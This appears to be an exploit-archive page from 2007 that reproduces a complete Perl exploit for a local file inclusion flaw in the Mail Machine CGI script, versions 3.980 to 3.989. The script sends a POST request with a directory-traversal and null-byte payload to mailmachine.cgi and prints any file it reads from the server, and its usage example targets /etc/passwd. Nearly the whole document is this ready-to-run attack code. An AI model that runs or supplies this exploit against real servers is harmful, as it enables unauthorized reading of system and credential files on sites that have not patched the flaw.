Home / os / solaris

mailmachine-lfi.txt

Posted on 11 July 2007

#!/usr/bin/perl -w #__________________________________________________________________________ # [*] Mail Machine Local File Include Exploit # [*] Vuln. v3.980, v3.985, v3.987, v3.988 and v3.989 # __________________________________________________________________________ # [!] Application homepage : http://www.mikesworld.net/mailmachine.shtml # [!] Author : H4 / Team XPK # [!] Contact : H4_XPK@hotmail.com # --------------------------------------------------------------------- # Vuln. code: # In mailmachine.cgi sub load { ... # open() function is not properly sanitized against user supplied input # --------------------------------------------------------------------- # [!] This information got leaked long time ago, therefore we think that # everyone should have this information :) # [!] Greetz to Angeldust & Narcotics and Streets and to rest of community. use strict; use IO::Socket; if(@ARGV<1) { &Usage; exit(0); } my $host = 'h4x0red.com'; my $port = 80; my $path = '/cgi-bin/mail/mailmachine.cgi'; my $file = "$ARGV[0]"; sub Header() { print "*=====================================================================* "; print " ---------------------------------------------------------------- "; print " Mail Machine File Disclosure Exploit "; print " ---------------------------------------------------------------- "; print "*=====================================================================* "; print " Coded by H4 "; } Header(); print "[*] Attacking $host .. "; my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $host "; my $post = "action=Load&archives=../../../../../../../../..$file%00"; my $send = "POST $path HTTP/1.1 "; $send .= "Host: $host "; $send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 "; $send .= "Accept: text/html "; $send .= "Connection: Keep-Alive "; $send .= "Content-type: application/x-www-form-urlencoded "; $send .= "Content-length: ".length($post)." "; $send .= "$post "; print $sock $send; while ( my $line = <$sock> ) { print "$line"; } close($sock); sub Usage() { Header(); print "Usage : mailmachine3.pl filename "; print "------> mailmachine3.pl /etc/passwd "; print "Do not forget edit host/path/port.. "; }

 

TOP